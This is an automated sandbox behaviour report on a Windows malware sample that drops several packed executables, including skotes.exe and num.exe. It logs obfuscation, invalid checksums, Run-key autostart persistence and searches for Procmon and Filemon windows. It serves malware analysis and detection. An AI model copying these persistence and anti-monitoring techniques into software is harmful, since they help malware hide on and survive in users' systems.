Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2994688 > 1048576
Source: file.exe Static PE information: Raw size of opmmjkup is bigger than: 0x100000 < 0x2af800
Source: Binary string: my_library.pdbU source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp
Source: Binary string: my_library.pdb source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2506913833.0000000000B12000.00000040.00000001.01000000.00000006.sdmp, 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000003.2373622075.0000000005130000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Unpacked PE file: 3.2.7YW0363WEKP7ULOI0QRA.exe.b10000.0.unpack :EW;.rsrc:W;.idata :W;mljriapp:EW;mudtavgt:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Unpacked PE file: 4.2.S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Unpacked PE file: 11.2.7451ae0b11.exe.140000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Unpacked PE file: 29.2.W7N881PI98FKFOKWDI7HCS7W.exe.a40000.0.unpack :EW;.rsrc:W;.idata :W;mljriapp:EW;mudtavgt:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Unpacked PE file: 30.2.7451ae0b11.exe.140000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Unpacked PE file: 33.2.DP4Z2JGIRNCYT3CKHONMY.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jqddeztg:EW;hzelrcyv:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: 58ce8f976c.exe.8.dr Static PE information: real checksum: 0x2e55c9 should be: 0x2e2609
Source: num.exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: real checksum: 0x1cf020 should be: 0x1cc05d
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: real checksum: 0x2c41f0 should be: 0x2c478b
Source: random[1].exe.8.dr Static PE information: real checksum: 0x2e55c9 should be: 0x2e2609
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: real checksum: 0x2c41f0 should be: 0x2c478b
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: real checksum: 0x2c41f0 should be: 0x2c478b
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: real checksum: 0x1cf020 should be: 0x1cc05d
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x2166de should be: 0x21ab5b
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1cf020 should be: 0x1cc05d
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: real checksum: 0x1cf020 should be: 0x1cc05d
Source: file.exe Static PE information: real checksum: 0x2e55c9 should be: 0x2e2609
Source: 7451ae0b11.exe.8.dr Static PE information: real checksum: 0x2166de should be: 0x21ab5b
Source: num[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: opmmjkup
Source: file.exe Static PE information: section name: dvfrhkft
Source: file.exe Static PE information: section name: .taggant
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name:
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: .idata
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: mljriapp
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: mudtavgt
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: .taggant
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name:
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: .idata
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name:
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: jqddeztg
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: hzelrcyv
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: jqddeztg
Source: skotes.exe.4.dr Static PE information: section name: hzelrcyv
Source: skotes.exe.4.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name: opmmjkup
Source: random[1].exe.8.dr Static PE information: section name: dvfrhkft
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: 58ce8f976c.exe.8.dr Static PE information: section name:
Source: 58ce8f976c.exe.8.dr Static PE information: section name: .idata
Source: 58ce8f976c.exe.8.dr Static PE information: section name: opmmjkup
Source: 58ce8f976c.exe.8.dr Static PE information: section name: dvfrhkft
Source: 58ce8f976c.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: xpxnzipx
Source: random[1].exe0.8.dr Static PE information: section name: atgrbfaq
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: 7451ae0b11.exe.8.dr Static PE information: section name:
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .rsrc
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .idata
Source: 7451ae0b11.exe.8.dr Static PE information: section name:
Source: 7451ae0b11.exe.8.dr Static PE information: section name: xpxnzipx
Source: 7451ae0b11.exe.8.dr Static PE information: section name: atgrbfaq
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .taggant
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name:
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: .idata
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: mljriapp
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: mudtavgt
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: .taggant
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name:
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: .idata
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name:
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: jqddeztg
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: hzelrcyv
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: .taggant
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name:
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: .idata
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: mljriapp
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: mudtavgt
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: .taggant
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name:
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: .idata
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name:
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: jqddeztg
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: hzelrcyv
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0156D7AA push eax; ret 0_3_0156DA11
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_014F457E push ebp; ret 0_3_014F4582
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_014EE0B6 push ebp; ret 0_3_014EE0BA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05BDEADD push edi; retf 0_3_05BDEAED
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0156D7AA push eax; ret 0_3_0156DA11
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0156D7AA push eax; ret 0_3_0156DA11
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CA984B push 410BC413h; mov dword ptr [esp], esp 3_2_00CA98D2
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CA984B push 20FE0D6Fh; mov dword ptr [esp], eax 3_2_00CA9961
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CB9A66 push ebx; mov dword ptr [esp], 6781B220h 3_2_00CB9A7A
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1EBE0 push ecx; mov dword ptr [esp], 2424DFB7h 3_2_00B1F762
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1ED80 push 1B57FC02h; mov dword ptr [esp], ebx 3_2_00B1F596
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1ED80 push edi; mov dword ptr [esp], 70FD6605h 3_2_00B1F707
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CA96DD push edi; mov dword ptr [esp], 7DFF2820h 3_2_00CA9726
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1E8B1 push edx; mov dword ptr [esp], 3FE71456h 3_2_00B1E8B3
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1E8B1 push 07F53464h; mov dword ptr [esp], ebp 3_2_00B1F0C0
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1E8B1 push ebp; mov dword ptr [esp], 3EFA729Ch 3_2_00B1F66D
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1E8B1 push ecx; mov dword ptr [esp], 5E3A99C4h 3_2_00B1F67C
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAA0C3 push ebp; mov dword ptr [esp], 487F2E14h 3_2_00CAA0D3
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAA0C3 push esi; mov dword ptr [esp], 25FEEA00h 3_2_00CAA16A
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAD0C5 push ebp; ret 3_2_00CAD0D4
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CA60DE push eax; mov dword ptr [esp], 6DFF94B5h 3_2_00CA6615
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B218AE push ebp; mov dword ptr [esp], esi 3_2_00B24FC8
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CB90E7 push edx; mov dword ptr [esp], 7FE655CDh 3_2_00CB90FF
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B2288A push 0B53B314h; mov dword ptr [esp], edi 3_2_00B2289D
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B2288A push edi; mov dword ptr [esp], 2ABEF28Eh 3_2_00B231AB
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBF0F2 push eax; ret 3_2_00CBF101
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B210F8 push eax; mov dword ptr [esp], edx 3_2_00B239C2
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBD085 push eax; mov dword ptr [esp], ecx 3_2_00CBD087
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBD085 push 3E8D4586h; mov dword ptr [esp], ebp 3_2_00CBD0FB
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1C0E3 push esi; mov dword ptr [esp], 57AA8FD8h 3_2_00B1C997
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B210E6 push 1E868B81h; mov dword ptr [esp], ebp 3_2_00B24E72
Source: file.exe Static PE information: section name: entropy: 7.965337240899708
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: entropy: 7.711704641489236
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: entropy: 7.9781027784871075
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: jqddeztg entropy: 7.952904890450544
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.9781027784871075
Source: skotes.exe.4.dr Static PE information: section name: jqddeztg entropy: 7.952904890450544
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.965337240899708
Source: 58ce8f976c.exe.8.dr Static PE information: section name: entropy: 7.965337240899708
Source: random[1].exe0.8.dr Static PE information: section name: xpxnzipx entropy: 7.952407047426657
Source: 7451ae0b11.exe.8.dr Static PE information: section name: xpxnzipx entropy: 7.952407047426657
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: entropy: 7.711704641489236
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: entropy: 7.9781027784871075
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: jqddeztg entropy: 7.952904890450544
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: entropy: 7.711704641489236
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: entropy: 7.9781027784871075
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: jqddeztg entropy: 7.952904890450544
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File created: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File created: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File created: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File created: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7451ae0b11.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 760934cb92.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 58ce8f976c.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: FilemonClass Jump to behavior
